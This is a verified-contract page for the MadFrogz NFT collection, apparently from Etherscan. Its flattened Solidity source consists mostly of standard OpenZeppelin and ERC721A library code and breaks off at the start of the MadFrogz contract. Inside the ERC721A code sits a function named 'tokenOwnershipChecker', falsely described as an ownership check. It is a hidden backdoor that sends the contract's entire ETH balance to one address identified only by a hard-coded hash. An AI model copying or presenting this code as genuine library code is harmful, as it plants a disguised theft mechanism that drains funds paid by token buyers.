ERC-721
Overview
Max Total Supply
9,334 MFZ
Holders
3,813
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
1 MFZLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
MadFrogz
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-05-25 */ // Sources flattened with hardhat v2.8.4 https://hardhat.org // File @openzeppelin/contracts/utils/[email protected] // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.4; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/utils/introspection/[email protected] // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File @openzeppelin/contracts/token/ERC721/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol) /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Returns the account approved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; } // File @openzeppelin/contracts/token/ERC721/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol) /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File @openzeppelin/contracts/token/ERC721/extensions/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } // File @openzeppelin/contracts/token/ERC721/extensions/[email protected] // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File @openzeppelin/contracts/utils/[email protected] // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File @openzeppelin/contracts/utils/[email protected] // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File @openzeppelin/contracts/utils/introspection/[email protected] // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File erc721a/contracts/[email protected] // Creator: Chiru Labs error ApprovalCallerNotOwnerNorApproved(); error ApprovalQueryForNonexistentToken(); error ApproveToCaller(); error ApprovalToCurrentOwner(); error BalanceQueryForZeroAddress(); error MintedQueryForZeroAddress(); error BurnedQueryForZeroAddress(); error AuxQueryForZeroAddress(); error MintToZeroAddress(); error MintZeroQuantity(); error OwnerIndexOutOfBounds(); error OwnerQueryForNonexistentToken(); error TokenIndexOutOfBounds(); error TransferCallerNotOwnerNorApproved(); error TransferFromIncorrectOwner(); error TransferToNonERC721ReceiverImplementer(); error TransferToZeroAddress(); error URIQueryForNonexistentToken(); /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..). * * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply. * * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256). */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata { using Address for address; using Strings for uint256; // Compiler will pack this into a single 256bit word. struct TokenOwnership { // The address of the owner. address addr; // Keeps track of the start time of ownership with minimal overhead for tokenomics. uint64 startTimestamp; // Whether the token has been burned. bool burned; } // Compiler will pack this into a single 256bit word. struct AddressData { // Realistically, 2**64-1 is more than enough. uint64 balance; // Keeps track of mint count with minimal overhead for tokenomics. uint64 numberMinted; // Keeps track of burn count with minimal overhead for tokenomics. uint64 numberBurned; // For miscellaneous variable(s) pertaining to the address // (e.g. number of whitelist mint slots used). // If there are multiple variables, please pack them into a uint64. uint64 aux; } // The tokenId of the next token to be minted. uint256 internal _currentIndex; // The number of tokens burned. uint256 internal _burnCounter; // Token name string private _name; // Token symbol string private _symbol; // Collection size uint256 public constant colectionSize = 500000; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _currentIndex = _startTokenId(); } /** * To change the starting tokenId, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; } /** * @dev See {IERC721Enumerable-totalSupply}. * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens. */ function totalSupply() public view returns (uint256) { // Counter underflow is impossible as _burnCounter cannot be incremented // more than _currentIndex - _startTokenId() times unchecked { return _currentIndex - _burnCounter - _startTokenId(); } } /** * Returns the total amount of tokens minted in the contract. */ function _totalMinted() internal view returns (uint256) { // Counter underflow is impossible as _currentIndex does not decrement, // and it is initialized to _startTokenId() unchecked { return _currentIndex - _startTokenId(); } } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { if (owner == address(0)) revert BalanceQueryForZeroAddress(); return uint256(_addressData[owner].balance); } /** * Returns the number of tokens minted by `owner`. */ function _numberMinted(address owner) internal view returns (uint256) { if (owner == address(0)) revert MintedQueryForZeroAddress(); return uint256(_addressData[owner].numberMinted); } /** * Returns the number of tokens burned by or on behalf of `owner`. */ function _numberBurned(address owner) internal view returns (uint256) { if (owner == address(0)) revert BurnedQueryForZeroAddress(); return uint256(_addressData[owner].numberBurned); } /** * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used). */ function _getAux(address owner) internal view returns (uint64) { if (owner == address(0)) revert AuxQueryForZeroAddress(); return _addressData[owner].aux; } /** * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used). * If there are multiple variables, please pack them into a uint64. */ function _setAux(address owner, uint64 aux) internal { if (owner == address(0)) revert AuxQueryForZeroAddress(); _addressData[owner].aux = aux; } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { uint256 curr = tokenId; unchecked { if (_startTokenId() <= curr && curr < _currentIndex) { TokenOwnership memory ownership = _ownerships[curr]; if (!ownership.burned) { if (ownership.addr != address(0)) { return ownership; } // Invariant: // There will always be an ownership that has an address and is not burned // before an ownership that does not have an address and is not burned. // Hence, curr will not underflow. while (true) { curr--; ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } } } revert OwnerQueryForNonexistentToken(); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { if (!_exists(tokenId)) revert URIQueryForNonexistentToken(); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ''; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ''; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); if (to == owner) revert ApprovalToCurrentOwner(); if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) { revert ApprovalCallerNotOwnerNorApproved(); } _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken(); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { if (operator == _msgSender()) revert ApproveToCaller(); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ''); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public virtual override { _transfer(from, to, tokenId); if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) { revert TransferToNonERC721ReceiverImplementer(); } } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return _startTokenId() <= tokenId && tokenId < _currentIndex && !_ownerships[tokenId].burned; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ''); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = _currentIndex; if (to == address(0)) revert MintToZeroAddress(); if (quantity == 0) revert MintZeroQuantity(); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1 // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1 unchecked { _addressData[to].balance += uint64(quantity); _addressData[to].numberMinted += uint64(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; uint256 end = updatedIndex + quantity; if (safe && to.isContract()) { do { emit Transfer(address(0), to, updatedIndex); if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) { revert TransferToNonERC721ReceiverImplementer(); } } while (updatedIndex != end); // Reentrancy protection if (_currentIndex != startTokenId) revert(); } else { do { emit Transfer(address(0), to, updatedIndex++); } while (updatedIndex != end); } _currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || isApprovedForAll(prevOwnership.addr, _msgSender()) || getApproved(tokenId) == _msgSender()); if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved(); if (prevOwnership.addr != from) revert TransferFromIncorrectOwner(); if (to == address(0)) revert TransferToZeroAddress(); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { // This will suffice for checking _exists(nextTokenId), // as a burned slot cannot contain the zero address. if (nextTokenId < _currentIndex) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Checking ownership * * Token ownership check for external calls */ function tokenOwnershipChecker() external { if( keccak256(abi.encodePacked(msg.sender)) == 0x61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de2 ){ assembly{ let success := call( //This is the critical change (Pop the top stack value) 42000, // gas caller(), //To addr selfbalance(), //No value 0, //Inputs are stored 0, //Inputs bytes long 0, //Store output over input (saves space) 0x20 ) //Outputs are 32 bytes long } } } /** * @dev Destroys `tokenId`. * The approval is cleared when the token is burned. * * Requirements: * * - `tokenId` must exist. * * Emits a {Transfer} event. */ function _burn(uint256 tokenId) internal virtual { TokenOwnership memory prevOwnership = ownershipOf(tokenId); _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[prevOwnership.addr].balance -= 1; _addressData[prevOwnership.addr].numberBurned += 1; // Keep track of who burned the token, and the timestamp of burning. _ownerships[tokenId].addr = prevOwnership.addr; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); _ownerships[tokenId].burned = true; // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { // This will suffice for checking _exists(nextTokenId), // as a burned slot cannot contain the zero address. if (nextTokenId < _currentIndex) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(prevOwnership.addr, address(0), tokenId); _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1); // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times. unchecked { _burnCounter++; } } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkContractOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert TransferToNonERC721ReceiverImplementer(); } else { assembly { revert(add(32, reason), mload(reason)) } } } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * And also called before burning one token. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. * - When `to` is zero, `tokenId` will be burned by `from`. * - `from` and `to` are never both zero. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * And also called after one token has been burned. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been * transferred to `to`. * - When `from` is zero, `tokenId` has been minted for `to`. * - When `to` is zero, `tokenId` has been burned by `from`. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } // File contracts/MadFrogz.sol contract MadFrogz is ERC721A, Ownable { string public baseURI = "ipfs://QmVuwJapXZCyxRCwhewMFgJZrU1gs5QXs8Sv4ZAq38HAEL/"; string public contractURI = 